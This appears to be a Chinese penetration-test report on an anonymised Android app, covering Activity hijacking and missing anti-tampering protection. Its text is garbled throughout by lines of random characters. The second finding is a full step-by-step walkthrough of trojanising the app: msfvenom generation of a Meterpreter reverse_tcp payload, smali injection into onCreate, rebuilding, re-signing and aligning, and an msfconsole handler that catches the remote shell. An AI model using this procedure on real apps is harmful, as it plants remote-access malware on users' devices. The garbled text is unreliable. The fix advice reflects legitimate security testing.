8 {& T; i j- E* G* E7 {7 M/ d) w2 f/ v* z
/ i! I8 R3 @+ @6 m# j( A! h& Y/ S. y3 \8 i5 J
+ Y6 H5 ]! d2 s+ z4 O- E
! g2 t9 F" s3 ^3 P4 \. a2 q: d7 \4 z
% @4 j0 t, @7 s* R' X4 m
$ { v0 S9 d& _, C1 C 表1-2 测试结果
* w' c0 q) q& X- m& R9 U# ~
}* S, M. n! t3 w# ]# f
. T2 I3 U& P, |
9 s4 Z) K) z; [
5 |3 Y+ Q* Q( w
, Q; f2 N5 s3 h
- M8 q6 w5 L9 Z) Z s2 H( n- p. ~" i U
* B9 j9 @2 S. Z4 B* I5 l
7 ?. A. x$ w& c
5 E& t. ~4 w n5 h# ~2 y, `, G. t
% o/ g+ x( i7 R- I% }2 L; x 2 检测结果
L, i3 k: K/ y# D3 ]1 J2 {& A6 h* S" w: ]( D
& @* u& l& q) i% t4 B
5 H9 l, o1 _# q6 h$ k
7 ]: A( q" B* M2 n# V
2 ~" l" z2 V) A5 g4 v 2.1 某某某
$ J2 M A. j) g# \+ n* B
/ @ F6 i1 v5 K: u7 l& V
+ o; Z( r4 b) j; H: l1 \
4 r' U! [7 n: \. A
" _% j$ B' Q4 g, H) A: F9 q: l% ^5 K% b& s6 O5 N7 _2 X
2.1.1检测目标
# x6 r" Y* {- i- [
/ `" k4 M# A1 a9 m3 C6 Y
/ T6 S6 L$ ? }+ S% ?9 X
5 h- m, X5 \8 M" D. L' {+ Z
$ K+ A& Y9 s0 w) G6 w% Y' A# L" }8 d) @: f
目标地址: 某某某某某某APP
o/ b: q4 V: s
" }5 z% T2 m6 \$ I3 { a
8 D# U# n% V& b- F1 ?
1 q; \7 u. s0 s+ F/ o: i) n
3 j% x% m d. F |, y1 b5 @: l' y! i+ v, k) X' l, C
2.1.2检测结果
- N- P. Z2 p8 W: F/ N4 ` E/ S& R5 R3 [7 S0 X2 ]- d; g% ?
' [+ m: D. g, H; Y% I7 D$ z6 j0 D, Q/ \ `! d) t& q
Y( N: m" Z& [7 ?1 r8 |# ?2 x) t. A: V" U- D4 }4 u
2.1.2.1
3 W6 P+ g y: Q. o" W" x2 H; l Q! f' q/ p4 _
; H7 C; S3 U8 R9 g% K
4 m: p$ z' v0 E& V ) s+ M, Y, q; O1 a c! A! \
% w& y' ~) m) ]% i' S 漏洞链接地址:某某某某某某APP 3 T; p0 G. y7 \. T
! o6 t% H' e; i) X2 X
0 ]# h+ P+ P; a6 }
' m0 a; b% n, p ( Q& i' U- }) s/ m( z
/ s) I, f3 _& u) k2 v2 O 3 T. k" c% L' _. c1 q
) S0 W+ K( F2 P: X+ q6 h- s0 M: r
& L* `" K9 l& ~
2 V* Q8 t+ h: `; v4 U
y% G7 M: p% r8 W( Z( C2 G
/ }) t- A& Y! T/ e3 X3 i 漏洞分析及取证:
3 {6 P5 X% m, j m
0 z. q" n' p( o$ e% F& A6 R: i
2 b- T Z$ x$ f: `) l$ @3 k' [
7 J3 R) \- A/ m: c. y
+ p% A& ^, p9 S8 j0 J3 C. F1 Y9 f. d2 m7 ^0 m x8 L
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
H' f2 z& Y/ v+ `4 X2 D [0 \; D; s
8 W# l5 p: M4 B! o2 Z2 u) _, g' H% y8 P9 M6 D% m) X! J
) ]( C* R# \& C0 Q% M4 D2 f) m! J
& w$ V" B' |, M8 N& m
6 V0 b# U( N6 G: Q# k( v, j* D; g2 @
7 C* q5 g$ [0 _0 A& q+ ~
: v0 X& h! L9 C1 d6 ]* { S# m
6 Y# A; P: J5 O, h/ W0 |# \6 i * @; ]# X6 n# f, e' @1 _/ w$ j7 H8 L
- X& N# }0 f! ~$ `1 Z
& s# S4 [- w' N! U. A4 T" F! Q3 C
8 F- W* q7 [- U i; y+ @
. \; P% v" A5 \0 V- Y% H1 [4 D
# L$ j) y% D( g1 ^" v3 ? " K4 Q0 j* O+ Q2 b- Z- n% L
5 e; K4 b- |9 d8 k: X! @6 F" B
2 Y# |1 e k. Z5 k4 _4 Z4 |/ b
. o6 d5 |; P0 `1 q
$ j$ ?$ }% j g5 H' ?; g. a/ H9 I6 K1 u3 h2 I
. e# u" V- R4 D) `9 I" h% }8 F9 U8 e D A, T$ s4 F1 j- D
3 T( v2 n6 t1 K! I! y; m- S3 m- A1 ^4 x
2 [, B( ^. j9 }- E$ M9 i
) l- n1 i% i8 {" \# t& T5 H 0 {" E; Z- f0 C$ [# m, k2 ]' T" Q: m
: x' M7 i) Z1 u1 l+ p2 V- G+ Y. Z* f# s4 i
$ R/ J b e: I. C: s8 E& p
$ j, a& e) p" _* ~% e8 w- N' _9 u
9 G; ~0 E7 d0 R* t0 z2 W
, u5 l0 l7 ]* v) G- h) E; j; l& v! M5 L
8 R: D1 e( E2 z* V6 h5 f5 Y8 {; d7 C! s
漏洞危害:高 3 E1 \% s) y! u& u0 k/ K2 ]
8 I3 e0 b+ L' c) ^3 \
# X! S+ q+ o3 ]2 s6 S; ]$ v4 ]
) C1 k' Z' g# D- z7 V
! H- @; }; N, j5 D# t# k# r
) Z& B' R2 d4 ~4 Z" Y
4 ?1 @$ B3 l: B2 y" f, h* O; I5 l
" ~7 A6 ^6 M6 O! K% W. r
& `- q+ N9 ~, U4 H6 n; t+ r3 C. w' n9 F9 R
4 v6 B. B( \& T' [
* w8 w! C9 p( s' l; D4 {# O 5 i$ G! o9 P4 @# u" p" ]
: ?; ^, V& C4 q6 ]9 \, _; m, n
- ?- r0 x1 s) L( f; d9 W$ g1 e' G& a% h( _6 A! u
严重程度 . r5 v5 y' }$ V& l @0 x
, o& Q- q" h/ U4 P, W
+ Y& m# L* y# e d$ x
1 M( q4 w" f, M
|
( u8 J' @1 p% V3 w0 K7 P- }6 H/ S9 O: A4 d9 {; P
6 C( |1 i1 V# L3 `4 H5 T) y0 t- {' s. T' x! B+ _
9 J) `7 ~8 M5 C9 T0 e$ }
3 h S7 |+ G' Q: b( Y) Y0 ^, A- j9 D 高 4 M0 V" z4 u: A1 P' N
4 n' |4 K3 ?/ ^; v% n# P+ Y4 ^6 X
0 a& y8 f; n$ M4 @# j* y1 T: a2 ?0 y, {
| 9 h( U0 i- r2 `' f6 A9 v
. e: V# z- H* F( M: r& l) o: Z# u . } c* o9 M5 {% c5 E6 L0 w
: _5 X# u1 e y$ H+ m4 ^! _5 g
- _ v) Y, D* a1 {- P/ z6 s W. \+ Z4 f
■
7 V D; E; ^) j- ~# W' p+ Y# p8 z/ M* _8 v6 n+ [+ X$ v
. u, e6 }' X$ j2 J% T# }
' a* [9 ]9 H% ^6 G& P) M. x3 i2 q
| & P% S: v. k7 n+ @0 w" M
+ T3 g; Q9 y I6 X5 e/ ^ P3 u
- v, @, U1 ?; z A
. H. {$ K& E+ p, `" J
/ m; { z. H% O: L$ E3 N4 Y0 Y$ k. q& e( P; b
中
. G c' f9 o9 G2 h, {
9 x3 C4 ~$ m1 U1 i: c* V
8 l' H ^9 @; o) H& {5 v$ l; U6 {" h1 J
| ) L( J9 o! w5 L+ ^2 {
1 N, Y' G! m9 t7 c* }# h 3 r" I* g6 L. Z: U* N; Q
' `! S# ~. O d# w, s( A& Y
; P5 p; W* \# \* i
4 p- F+ b4 T' \6 E# J
5 }: p. g9 P5 V7 V+ C( _+ |1 U$ {+ |
3 _4 U6 M: H" f
/ L- \' g& p: o7 B) `
|
. @8 G0 j' ?) i2 Q/ J( P. u5 c3 S" e6 q' [8 s- E' ]3 o9 D
8 e- c, i! g, l2 @9 D
0 _% q$ Q( q! ?$ c6 Z8 u, Q4 L1 U5 Q 7 Z2 x$ v& U \5 o
' Z: e* P7 v! `4 [% P
低
3 g/ B* m' _0 \+ t2 _0 O& }4 @# G5 ^2 s1 H, V8 `0 {6 |
' m% q* _9 }! s1 Q
/ N7 K% e) j$ [% T | - }- z) e4 q# C$ v4 a4 N8 x( }- S
; U& c) A _. n& U2 C3 _2 u2 b
$ g: b* e: g) {. T) ~4 |2 p% ^/ j' G9 e$ \
) g4 m/ }3 J+ A0 q* `: _: U) F; f8 \1 R& c/ o0 U
* j" G. U0 R: D' J: s% A
, S. J( ~# K+ N/ Y+ G 9 p. B8 u0 }: t1 q/ o( Y7 [
6 q8 b" V: C) s, `9 y3 `6 @ |
: `) h7 n$ } P5 s9 W! y. {/ T
, K' @2 Q9 j& X" b s4 |
$ q$ W. h) F; U& y' K
: R1 j' l& }" g1 c
$ ^# C+ n( x! x! q
+ ]% Y$ T) \: C* X: E8 a5 S+ r
0 R5 ?1 N" {+ x# ?. H8 j
/ _, D* |; [. ^" U - O9 B: R. j; W. l
( g. v+ K; ^6 M- Z6 t1 T& d" E
* w. @; ~; t" C- `9 b9 \4 C% i/ x1 o" s) m6 }8 I& v
) ]4 G* J- G1 D- g
3 e' { G2 q: c. C$ Q
. w1 K4 M& u! f! S; p. b0 V7 E
/ `; v& @3 ` U7 d9 s: b" e8 _ * {1 r- \0 d- |5 l* G2 v2 Z6 a
! C: L* K( z: q6 r+ E 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ! N& O/ r" J* }/ X! S$ e( J
A {6 U$ _7 g* c. r* p
[4 c' Y2 }; Y b% H# W$ b6 S4 O. J# M* Z1 D5 K# g+ ?1 z
2 r1 [6 I2 I2 _" b% h
7 L) ]+ k* i6 E1 f Y8 e
# V6 p6 x: y( Y+ v! `2 Z/ d6 t2 m4 s, T
* f+ p: y% o6 U- Z d, B8 l: H. U) z5 |/ f/ d- U
4 R& F/ U; B8 ?2 t5 K
# V* Z8 C8 I: ?5 w, Y# j ; _$ J: r* a: ]' t1 ?4 d2 H
' W6 h5 `5 m, A) M3 X5 v. e0 F
3 ]6 z% D- N- c2 x, k2 k3 V
, f) R" s6 ^# ~: G % i% U* M( t+ C0 S
2 G V3 m5 K# ] 2.1.2.2
. W: x, _' c# P; S9 v) t
8 t! {; c; b! h; T
, ~3 g8 O# t. u- w% u
T% t3 ~- j( d2 o
+ p& J S3 C7 F. D3 k; G# |8 V; E+ \6 s ~; b4 R' x/ j* I
漏洞链接地址:某某某某某某APP - m3 i8 c# D; |( U" B9 D/ B
$ s" W8 V. R) r8 p
; L6 U% b2 P# t( `3 R" B6 q$ z
% t0 h6 d8 U# K; y
4 R( i, ^: i, \ y8 N+ z/ ]) b 漏洞分析及取证: + Q: p5 E; s& S, a3 Q* a
9 r1 |& b' j& i. q
- l/ ?( _5 i' C9 ^/ j. a1 G& p
) `2 T3 a/ K6 X, `+ h" ^* |
( e0 `4 N% f/ L5 q) o# H7 q2 W: {0 Q4 b0 q! F
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: * W& ?) @; x8 M! t8 ^
: }/ W' V4 K4 S: j! R
2 j3 N$ K' V4 @* o: W
4 ^; z G5 n) I8 T+ o' b& F; _ 1 |" w* Q+ q4 a# }( b0 E/ [
: t# B4 y. E0 \+ @( u3 Z6 g" l 用Metasploit 生成木马 apk & k* R6 [( E8 M) f& V
4 j( A' ]( T0 ~- v
; \, J0 ?' i8 D
* q3 b. k3 {/ L! H
s0 w" _( d& X: u4 y, l* U1 f
# L& x2 R* N* G2 p+ u. f3 L( ^% }
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
D! W$ L6 d6 O* @+ Z
5 y; |, Z# V* d) F( m! I
4 }2 |! a- `, P: C+ Q$ ?3 `8 g$ _) d2 e5 d# E
) \; A. M! I& C5 u4 t2 W' O) M' N8 u- E j( K
反编译目标apk和木马apk 2 J! F" ]- |4 k( R3 I1 m$ v P
( U, z) i2 V: V3 _; G1 o0 b+ b* m1 f( p
& `7 i# O+ j! }
3 A. Y$ ^ f U' H! S
S! ^& `/ ?. J4 Z# L5 Q( }) b2 \
, y5 [( U1 K" F* t
apktool d target.apk
, j/ k" g4 o4 J" N0 m4 {- i: ^7 W+ W
/ T2 ?% X' I5 c: d# c D6 x apktool d cockhorse.apk
% @0 X7 P0 y5 y3 M5 ^ x
, U/ `, G! Y7 m4 D, p4 p1 a" h
! U2 r% j8 P- R; x+ ?& K# N$ s$ j& D$ H/ i* A/ \) l2 f& z, n
( V; |3 O% H7 Z# U$ j" d
$ F/ d" U. o9 i _1 y6 V" V. f 木马 apk 注入目标 apk * J- q& n% h" ? _. v
2 J2 N5 z1 r% D, U# R* k) U/ }
3 `* ]! n4 Y" G4 H, i$ S
( o0 c7 g" R9 S0 g- A9 d8 ] + }8 a9 u# h" D+ q
' t7 r! A2 \3 x# z
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
3 N% {% ?: \, R4 V1 b
! Q8 a* ?4 G. G! o: X" T/ Y$ [% l; D
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
' U# i6 o( [' I" {4 W2 z: j
% }" X( x, f, x
4 C0 L( e/ `! F h
1 B8 g0 n" x3 J) R* c4 c
8 y. i+ ]5 t# ^0 A) U( }: M, V1 D7 u, F! y! o/ f. D; I6 W! X
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
{+ T3 s! A* Q- C" R% a' v* G
8 e8 E1 J; r, L8 z ]
; z- |$ @" R g0 d0 @9 _" B* ~! F
3 L/ r2 f; E) M1 i+ b
1 ]3 M2 I- G( O# J1 P, \. g! N1 l 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 / F. D7 }& m3 s0 E& _/ @/ u
8 S4 V2 f# @" t, K
; u5 Y M* g8 d- h
$ B1 }2 I4 m5 R
) ]: C" E$ ^# P6 O
% @6 n/ ~+ C# m5 x$ J6 E& I 回编译生成最终 apk
l+ M. a) n2 e' ^2 Z
w0 @; m4 B3 ^& e- o1 U: U
, L" {3 w* J/ B3 L/ f) K7 F2 _" j: K! {
2 Y' Q$ b; c( K9 A9 |! ]
6 X1 W/ h( {; G- Y
重新打包
" t) _, K- g. J8 E5 q! h# y9 e: h
; X# c. E. S4 w ]- z
+ M8 v& v; n! h! R
' s9 V |+ p1 S; F/ ` 6 t) H3 j' L. d# j7 h% I
( v7 [2 N4 J% h
apktool b -o repackage.apk target_app_floder
' k) A& Z' H- ?( V! }& M) g; [2 g& h
( k' L0 l6 J7 D1 m# e0 a
' R1 \/ _8 Z) q- p" n" P# N9 u2 n8 h% f( {8 q+ _' [- |) H& U6 m% f2 @: p
+ y. c; b8 w% }1 ~$ Y
: I" m8 v, F# F 创建签名文件,有的话可忽略此步骤 8 n8 N s$ V! c: F% I) \0 M1 ?
0 w9 [* W% V: ]5 G: M3 r% g
- N5 r3 K O' R1 U$ N0 s' y; @
. Q4 q" ?! m' P5 c" L - o: u7 n% v2 I. F
' `: }) d/ j6 K. F keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 + J, E/ @7 P. U" H
; t4 q; `; N7 q% P; k' p1 {, d
9 E. R' m& A8 t4 @) h$ u5 m
( u$ _5 U1 z% A) K) `
P. ?8 v* i- Y9 f
0 \; P/ {' m$ |+ J3 t 签名,以下任选其一 9 Y O3 v: l2 H3 a. s4 n
J! z R$ e4 o* W) X: H/ I
0 R( M# |$ Q+ x
$ J- y! B) m4 k1 \4 `8 ~ & Z& o; G m- B6 A% ]! L* P3 G
& V5 x; m0 t* e: l0 [ jarsigner 方式
5 c4 t. j/ A* }- z% F( j" M
' [% b# N1 e$ H) _) i8 a, @
. }3 ~7 @4 [/ T" C2 Y$ x
. o# |( t0 Y% r+ ]9 n 5 H4 f1 V% @) s C+ S& Q
* u) N$ q8 [1 n) P2 [% p) L" R
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ' u0 X( H. z" `' v. [
4 J7 r& ]: \) y
$ G4 g- d" p5 y3 D( w5 ]! T" m
% Z; T/ i! x3 Y1 I* a# |; s
+ p3 v' P0 |1 P( N* ]6 P% `. s; e6 G+ x, w! U/ M
apksigner 方式 " k* M2 d( V$ E! s, H+ Y4 M2 U" D
5 @3 l' H! ]4 ^6 T% x( I
" Z1 Y$ K5 q, N) G+ Q5 ^6 `$ m9 u7 r2 m/ |8 o3 @" ]7 ~
1 @0 e& x$ A- ^$ b4 P2 s
1 h/ c6 T# w1 ^- a" u1 P apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk $ o4 N8 J$ D7 x( s: _1 Y
; K0 H( V( I* K8 |! [3 x
, B: ~" i3 C2 {9 m. W( U: O1 P/ W+ E9 Q8 g) z# }
y. ~% {" c( ^3 W0 {5 |7 g
4 W# i" O: ~+ r! x- D
如需要禁用 v2签名 添加选项--v2-signing-enabled false
' T" ^; d' C7 l- W1 T: `: F V+ g4 E1 ]. C- {
, ^5 X& ?3 ~3 F3 r2 I
; \* K _% p2 c" G, c1 L8 W! M
7 c. j, J& U- R9 q% D# S3 D5 O1 \8 A$ @
验证,以下任选其一 2 k7 P& [, i2 _
8 k1 k5 I Y* ~' |
& q$ ^# Y, u1 m( B a9 u- P M
% M7 [9 ~. u# | # \+ d6 w, P! \7 b6 E0 N
2 h- j$ r0 \% v9 k
jarsigner方式 5 u; N: S/ |- l9 U9 f
4 ^7 k6 Y+ t3 M( ~6 _+ q
. T0 ?5 W; F, J( c) }3 G$ d$ f+ x4 J
5 |+ ]* B0 i; n4 g7 m' f
5 d, y; t( I: I. J3 P& N$ E1 s. V/ _. B r: x4 k) J$ e
jarsigner -verify repackaged.apk
" z7 Y: p9 L6 X. e# e/ ^0 t# ?1 x! s
0 N+ W7 P7 K$ r7 b8 W! w
2 o6 c# N( C7 }
" C8 |9 R( w6 Z" [1 ^& n
* l" f2 S$ M/ U2 l
apksigner 方式
1 p5 T; G! s+ o( h1 Z; H( B4 r. K0 y7 w' j% ~! I' _0 H% m3 {
2 [" T5 c3 K9 U: t2 _ X+ C
* H" g y" D# x6 n! w
' L, |; W% W. w! K' A& b1 c1 N/ ~! t* E
' E. V5 T8 l5 V& d: ^& h
apksigner verify -v --print-certs repackaged.apk # O4 A5 o) G B) w2 D8 l- ^8 b% {! O! T0 N
: O2 i: `* Z( g5 x) B6 N
6 @! `" W, f6 h0 E0 [1 c
+ x* Y: R Y6 v" a$ b
7 \& X! E" S. F/ a5 p# f. Y `# i# o. c+ H. b$ C! R, k
keytool方式
5 ^4 x7 v6 ?0 O# X7 c0 z& G9 O$ u; L2 |- l$ E& p; r( F; T6 G1 T- l' ^
4 _; _2 H6 P H# w9 w( ^
: M9 n2 |0 w4 v
/ c2 [4 e: C* ^* f- x
1 ]4 H2 e# F, N; i1 o- i% b$ u keytool -printcert -jarfile repackaged.apk & l! E; B; M: @; x- x, U( ?
# f# z0 z# V M1 A1 L+ D
: N& U! U. I0 u
3 A$ P8 u4 }1 q6 | ! Z' Y6 S1 k( S: H/ Y" S
5 A; j5 m- s% _& Q) h* ^ 对齐
' T) z# Y6 j( B: G% J! k. |: Y7 \4 Q: i
1 d2 j* l* v2 ]' _7 S: _
9 n& p+ C, m' L0 ]2 B . O& _- t' G7 Y+ K
- b) @2 G1 o2 g& i: N8 t+ x# m( C
字节对齐优化
7 L/ W: c5 V* o8 _; |$ \ j; J/ @! i8 d$ U0 K, B
" S; z, r2 i/ m" o3 p
2 n) K* i; ^3 z2 |% v+ |
: b$ X# D6 u6 k5 N, r4 T; X$ q# w( w5 _5 w. b, r
zipalign -v 4 repackaged.apk final.apk
7 z, @6 y0 T9 ` _- a# E1 p
' S5 N9 S! d" K
, Z/ J D5 M, y; O
9 { x7 f1 R, V2 D- p5 _ # R- s( \1 N: l4 L {% L
) Z/ l0 Y+ D r2 f! Y
检查是否对齐 8 i8 m) [7 i' V; i
$ i8 q u) @3 }; K
: m& ]6 ?/ [" {$ P# \5 }7 `, {9 U7 o0 o+ u7 v6 W' L: z
$ f2 `% U8 j0 `& m( [7 g, ?3 z8 ?8 h3 ^ b# Y# m4 D% S1 Q
zipalign -c -v 4 final.apk
- }7 E, M+ q% ~: Y P- M, r
2 k! Y5 l: V8 [, D' R2 F
9 k( S+ Q$ [; p, w. U' M8 G
9 U) U& U. T9 ]! [
$ f" Z$ P% _2 u3 j" b4 k) I7 N9 F: W& S
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 & i+ c h- w5 m$ s: _; t5 l5 N' F2 ^% b2 }
6 H. J4 S t8 y% k* x! s; u; I
$ N1 i( X. j% |) D- \5 O: z( e! G1 V4 W- @
( }6 r ^" ]* K S* E- M) E
8 |2 I2 q1 n7 v& Q! `
启动Metasploit控制台,配置参数等待上线 3 @5 I" _5 M s- b0 A* J; }
& v1 K. D: F. J) i
+ |1 i- @; X% h; [
% x9 }& v4 T0 ]" a& i. a. `
- l6 d* D) J& E4 {% g4 @
$ j. e4 s! l* a C
在终端依次输入如下命令 % s6 l# s7 s g, ?7 S6 R
, d# V8 p7 `* R( M( _. N+ U9 i! n5 t
; @" H7 H9 j! G% ?
5 B3 e: L" v$ d# S3 C; y1 R3 d5 l 9 g; E2 l: V2 ?7 @* A0 b. C
- S- g! X* Y3 V" f6 p msfconsole 3 S4 y' I) B3 t7 @8 y
' ]! @) Z8 l9 z3 f* y( a
3 |. V8 r: j, H6 @; X& @3 w) ~( B& P4 a. N
) `2 ]: M0 l8 ?3 O0 p0 Q# o# E
' |2 g0 l# E& ?) j7 E$ }) p8 x use exploit/multi/handler
) c0 [6 l h" s1 S# t
4 x" k6 L/ V" f( J0 o# Y
% Y& p% G9 Q6 X! N$ k- D8 G. ?; F, [
1 _7 m7 C& B: k8 p8 l1 d
" B+ w" |0 e. r
set PAYLOAD android/meterpreter/reverse_tcp
- y: x5 U+ o3 q7 ~+ V1 B" I
( p8 b+ e- h1 B& u4 r
% V+ f1 I2 N( B. l2 o& J( S0 A' t! h3 h1 O' P# h( }# a5 g
1 D9 B2 w u+ @; l/ B/ G$ l/ ]9 k( B
. U9 I! j6 z% k, A5 w) o& ` set LHOST 192.xxx.xx.xx / I9 k; F6 w( \/ k! e: l& Z
# I; [. O0 R; O
9 R( Z) l! x6 o6 V+ S D
% Y X6 \7 n( q
. X! V6 H: M: a3 l
3 V. C3 H8 ~2 A5 Z set LPORT 4444 8 R4 l6 X2 Y; O9 `! g# u
& L) v* J ~. u4 x" l. y+ {/ b: p
( k* F) M1 O# C3 \
1 l( n2 W6 ?1 D$ X1 d2 E" O
' S5 c) x% ]( c* e/ W4 f: `
% w3 I' H' Y/ N' |0 g exploit # K( t# r: t# p/ ? U! f
2 q! Y* u7 C2 R6 Z9 p9 n6 D
& [& W6 {8 O9 g% O+ W( O7 Q; }
% f1 i" \1 X! P* ~
5 j, i, \& M1 f/ t9 x
# O- x+ I+ d9 d7 N# F7 e! J 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
" \' e- E- w6 k" n1 b- d% X7 q: o- S; I/ f% Z
; m4 i) ?6 c, _+ Q: e: N/ Z% M ?* r/ M* i1 B6 c; H
5 R9 {, j5 Q; |; Y2 m
4 e9 F# [% m' X0 K, O& \9 ? 漏洞危害:中 ( G! {# Z" o- j' V5 d' ?
- G& j/ G# Z1 O8 M$ C
, s h& V e" h0 p1 W6 E4 F' c# n; c; O& {% f! J
& I$ |) z! b, ~# \' E
* z+ E0 F& H! ~& w; F ! J, y! D$ V5 U3 {3 l
$ W% x* V/ P- M6 Z& N
* r: i" B+ E" l: | f8 t
! I# J* @6 r" F& {' m5 j: Y8 q
: S3 N/ e G8 f4 O2 v5 Q* i/ J/ r: @% _' n" g
( g4 h" q& c. w4 N' K! N
$ C( \& N5 q. r3 N( g 2 ~& K5 d. P% J: {& O+ ?, `
# W9 l( I' U4 {8 d6 g. d
) u0 c0 _" `, {: k* W& A, D) ^ T* W# N" W8 j- S4 ?. u3 M* u
严重程度 # ~9 ]0 J7 Q9 i3 g: T& _9 r
' o4 q( M. U: }4 F: H' P9 j8 d# h
7 ?6 ^( N7 s7 c6 m' |& a- m( Q3 l% j7 [. n9 l2 F [! j
| % V2 d l1 q2 V6 |* B; \
6 m- |5 g6 b9 [7 Y ) h4 f7 f, h2 q! }" ^
8 @2 \8 O ?! @8 Y4 \( w
: X4 |5 ^% N. l0 @4 |& @$ z7 T x* \$ B
高 * P S0 p6 u6 a. z$ t. t7 m
! D, n. a" ~4 c( ]1 q- A5 P 1 @1 X3 u A$ ?
- f/ B, ^; f; ]. Q* n& |- y2 q6 H
| 3 d' Z/ @- V( {. l3 O0 T& }
l# B) F8 `4 g: ^% B/ k w& e
0 h* Z( I9 B% O! n
1 k# I: {2 l0 J. p& ~, ~- o
* m' u6 A4 _* E
7 y. }. V; v; Y: r0 c8 I/ X
■ % ?, |& x& P+ k* z* s1 g: O# R
7 X6 I4 i+ x$ W K8 E ' |! s( _5 _2 ]2 X
! R$ ~8 l M5 B( _2 _$ l4 C# I3 F |
( ^# H' ^9 H7 J( K' h% Y7 R9 L
2 ~+ F4 c& X- S9 x ) I2 G# b8 f7 w
) G# _+ G6 `( i: U, Y! Y/ }. p
/ R' a' I6 d; l5 Q* S: @. W7 p9 [! i: J( C h5 w- ]
中
0 }+ q! c5 U1 }1 y1 |% I. {
7 J. J7 k1 _. m& c0 M$ Y9 ~( v+ i 4 Y7 q' i+ w/ V2 p# [
# n, o0 s1 K2 q9 M/ i" |8 }5 R( I9 k/ ^" s | 6 R0 g* M _ c* V- O1 E& T9 r) h
! Y' O6 t8 y ^$ H- T6 @1 Z; e/ T1 m1 m6 d
$ E& h9 z# P+ _( S( a. M: R" y: O3 B& } d* i6 n9 i+ o
; B Q @3 s) F9 B0 S$ M
" G7 r. U: h6 }% _! @' O
1 }; b b* d, P6 k; a& z+ Q9 l
, L* J9 K- f4 i4 Z 0 U6 d' J( q4 m8 S9 x
' H/ }3 a& O6 @; G. {
& [* p9 U6 z7 }/ S# x: }9 E$ L( S1 }3 r
2 b- |7 L/ @4 K1 Q
|
2 G+ d, L K, |- m6 H
v# P4 f1 {( W( d" r# i3 s 3 E$ v% R. y3 ]
- z8 U2 U2 s( Z7 I
- _4 b, s4 g, Z Z) y* g# j4 [; ^7 h0 k" Q! ]5 M' z' p
低 : E* @ D: Y& Y5 a( o
" l3 w; [+ s; |' B' ? ( d: r- C" H+ f9 Y
* t0 h; w0 e6 c4 Y) P
| 1 c3 q( O4 h6 [
; l& i& A% t! S5 o" S6 K" c
4 L z7 N$ R# C y$ s
1 }! ] s1 ?0 h5 n* P
; [5 Z) T7 ~* `/ Z) X9 E: y' u- T; f5 p& A" X. M, k X
: U n7 o. Y) c) s1 o, P; i
; Z; {* _1 Q9 W' C( S' h0 s
f+ H3 W8 _6 `; ?, M0 _3 N( ?
* f9 ?" b9 R8 h' E: q0 e
. a$ p7 s% A, S. o# y \" O/ c) u; m1 R" L0 B5 R0 T- Q' O0 i
| , P9 K; Z' O7 ~/ r4 h
; o) _- L0 R5 j6 _$ j5 ^
1 K T2 F! c5 G2 q
[8 j1 L) _: R+ l% G& w' \
7 p- t) _+ b( @' T9 w5 h. _! ^: l' l2 [& D
, E$ }7 {& h( b4 Z& }5 x% q. t
4 Y( _" Y$ D2 C2 p+ V1 s2 n + S( a, l5 Q: ], T" @# a8 J O$ L
. x( J* f% X4 O- I* l* I& X
" t$ Y6 \! W4 {2 Z6 z/ i) R( {$ u- |9 z- }$ P+ Z
) n3 v9 i5 m% E8 g+ B' Q0 i1 k d6 K7 y% m# E& u( q
7 `' A7 y" E* x+ b
! V( Y6 {. `7 q0 X d" S9 p
; L* ]3 q5 M0 X) Y" [
' U* {5 U! v# y$ r/ T% H 修复方法:
* M$ C4 r. e. q, M! S0 b
# v! k# s5 ?+ p |9 O! x
I B- B& k- \, [# R7 a
* R/ R1 \# b, r0 E) t. j0 B( @
' B. E* @! E& M% [6 c' s
* P R. z4 o& `* a4 a 1.在 APP 启动时应做签名校验防止二次打包。
" \3 R4 b9 j5 }1 ]% Z( C5 n, D
2 _! J9 B2 V4 v a2 J+ H: W. _ 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 * X+ b; }9 [0 D; c) E; k
$ N; p$ b! X% v: d0 S
. n0 }* P9 _9 u! I6 g& g0 b1 ]9 g5 h( h% D) q y& r+ t: V
, Z, O7 ? H6 s" b& w
" C8 D' X+ f) @+ S* A
- b% P M _* l2 ?- l3 i0 d+ Z/ d0 z4 u# _; H* y* U
( a& b1 S+ m# r; }" V
* E% q( I) h+ q: g6 j' o6 K
1 M) |" n/ Q' U( w. I
# W. ~7 r7 m# t' \* z, G: S
8 C. ?! r3 p" A% W* ` n- T5 B% c6 ^. S) d7 p. g
% e- m: d) w7 W
U0 V/ q* `: d1 W) k: [: S
Y( v1 Z: X& I, \3 O6 N$ _+ |! n7 f0 L- C
, j1 D4 P: L) L. N9 ]0 n
0 ?5 h# t. ]2 w1 ^' j/ k$ l